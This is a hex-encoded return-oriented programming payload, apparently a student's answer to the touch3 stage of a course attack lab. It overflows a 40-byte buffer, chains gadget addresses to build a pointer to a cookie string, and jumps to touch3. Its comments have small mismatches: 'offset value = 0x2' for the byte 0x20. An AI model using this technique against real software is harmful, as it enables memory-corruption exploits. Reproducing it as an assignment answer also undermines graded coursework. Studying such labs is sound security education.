/* 0x28 filler characters */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

/* Get offset and move it to %rsi */
ab 19 40 00 00 00 00 00 /* popq %rax, %rax = offset value */
20 00 00 00 00 00 00 00 /* offset value = 0x2 */
dd 19 40 00 00 00 00 00 /* movl %eax, %edx */
34 1a 40 00 00 00 00 00 /* movl %edx, %ecx */
13 1a 40 00 00 00 00 00 /* movl %ecx, %esi */

/* Get pointer to 2 lines below this one, add it to offset to get the pointer to cookie string */
06 1a 40 00 00 00 00 00 /* movq %rsp, %rax */
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi */
d6 19 40 00 00 00 00 00 /* goto add_xy */

a2 19 40 00 00 00 00 00 /* movq %rax, %rdi */
fa 18 40 00 00 00 00 00 /* goto touch3 */

/* cookie string */
35 39 62 39 39 37 66 61
00
